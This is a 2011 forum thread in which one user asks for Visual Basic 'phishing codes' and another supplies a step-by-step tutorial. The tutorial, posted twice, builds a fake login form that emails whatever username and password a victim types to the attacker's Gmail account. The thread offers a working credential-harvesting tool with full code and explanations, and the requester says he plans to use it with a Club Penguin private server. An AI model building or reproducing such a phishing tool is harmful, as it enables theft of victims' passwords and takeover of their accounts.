Post: VB 2010 Phishing Codes?
04-10-2011, 01:05 AM #1
Jared
Tranquility.
(adsbygoogle = window.adsbygoogle || []).push({}); I am making this:
You must login or register to view this content.

I need some codes so I can hook it up to my email and get the information?

I have tried codes and they never work!

Any Help?:bro:
04-11-2011, 04:25 AM #11
Jared
Tranquility.
Originally posted by St3ven View Post
Lmfaooo i made a exact same program like this like 1 year ago... im not sure if i still have the project or code... if i do ill be happy to show you, but if i don't i'll link you to a vid i followed.


okay if ya make me the codes thanks
04-11-2011, 04:28 AM #12
Default Avatar
bman53
Guest
Originally posted by iKeep View Post
okay, if i do try this where would i put it?


Im not 100% sure, sorry
04-11-2011, 04:30 AM #13
Jared
Tranquility.
Originally posted by bman53 View Post
Im not 100% sure, sorry


okay! well if you know let me know:bro:
04-11-2011, 04:50 AM #14
Default Avatar
bman53
Guest
Originally posted by iKeep View Post
okay! well if you know let me know:bro:


Okay, i will

---------- Post added at 12:50 AM ---------- Previous post was at 12:38 AM ----------

Originally posted by iKeep View Post
okay! well if you know let me know:bro:


Well kind of copied and pasted (sorry) This equals a tutorial as i dont know what your setup is


1. Start off by opening visual basic 2008(doesn't have to be 2008 but that's the one I'm using) and create a new project.

2. Make 2 text boxes and 2 labels and 1 button. Position like this:

3. Double click the button and type:
Code:
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Username")
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Phishing program " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Email has been sent")

It should look like this:
Code:
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Username")
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Phishing program " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Email has been sent")
End Sub
End Class

Above Public Class form1 type:
Code:
Import System.net.mail



What it all does:

Code:
Import System.net.mail

These codes allows us to use mail commands like
Code:
smtpServer.Send(mail)


Code:
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()

This is just telling the computer we are going to be using.

Code:
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Username")
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True

These codes are connecting to the server. smtpServer.Credentials is just like you were signing in on their site. smtpServer.Port = 587 is just saying what port that you are connecting to and what port has to open. smtpServer.EnableSsl is saying yes connect.

Code:
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Phishing program " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Email has been sent")

mail = New MailMessage() Is saying this is going to be a new message its just like if you were writing a message on the gmail site.
mail.From= New MailAddress("Your Gmail") Is just saying who the email is from.
mail.To.Add("Your Gmail") It is saying who you are going to send it too.
mail.Subject = "Phishing program " & TextBox1.Text This makes the subject Username: "And the text you entered in textbox1"
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text This is used to write the body so it would be Username: "text in textbox1" Password: "text in textbox2"

Thankyou for reading. If you have any trouble please reply and if you need any help about anything just reply.
04-11-2011, 04:57 AM #15
Jared
Tranquility.
Originally posted by bman53 View Post
Okay, i will

---------- Post added at 12:50 AM ---------- Previous post was at 12:38 AM ----------



Well kind of copied and pasted (sorry) This equals a tutorial as i dont know what your setup is


1. Start off by opening visual basic 2008(doesn't have to be 2008 but that's the one I'm using) and create a new project.

2. Make 2 text boxes and 2 labels and 1 button. Position like this:

3. Double click the button and type:
Code:
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Username")
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Phishing program " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Email has been sent")

It should look like this:
Code:
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Username")
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Phishing program " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Email has been sent")
End Sub
End Class

Above Public Class form1 type:
Code:
Import System.net.mail



What it all does:

Code:
Import System.net.mail

These codes allows us to use mail commands like
Code:
smtpServer.Send(mail)


Code:
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()

This is just telling the computer we are going to be using.

Code:
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Username")
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True

These codes are connecting to the server. smtpServer.Credentials is just like you were signing in on their site. smtpServer.Port = 587 is just saying what port that you are connecting to and what port has to open. smtpServer.EnableSsl is saying yes connect.

Code:
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Phishing program " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Email has been sent")

mail = New MailMessage() Is saying this is going to be a new message its just like if you were writing a message on the gmail site.
mail.From= New MailAddress("Your Gmail") Is just saying who the email is from.
mail.To.Add("Your Gmail") It is saying who you are going to send it too.
mail.Subject = "Phishing program " & TextBox1.Text This makes the subject Username: "And the text you entered in textbox1"
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text This is used to write the body so it would be Username: "text in textbox1" Password: "text in textbox2"

Thankyou for reading. If you have any trouble please reply and if you need any help about anything just reply.


thanks will try l8r!
04-11-2011, 05:02 AM #16
Default Avatar
bman53
Guest
Originally posted by iKeep View Post
thanks will try l8r!


Ok, make sure too tell me if it works
04-11-2011, 05:06 AM #17
Jared
Tranquility.
Originally posted by bman53 View Post
Ok, make sure too tell me if it works


okay will do, i am making a club penguin private server, gonna see how this goes lol :carling:
04-11-2011, 05:17 AM #18
Default Avatar
bman53
Guest
haha nice :P
04-11-2011, 05:23 AM #19
Jared
Tranquility.
Originally posted by bman53 View Post
haha nice :P


lol yep we willl see lol gonna make a trainer tooCool Man (aka Tustin)

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo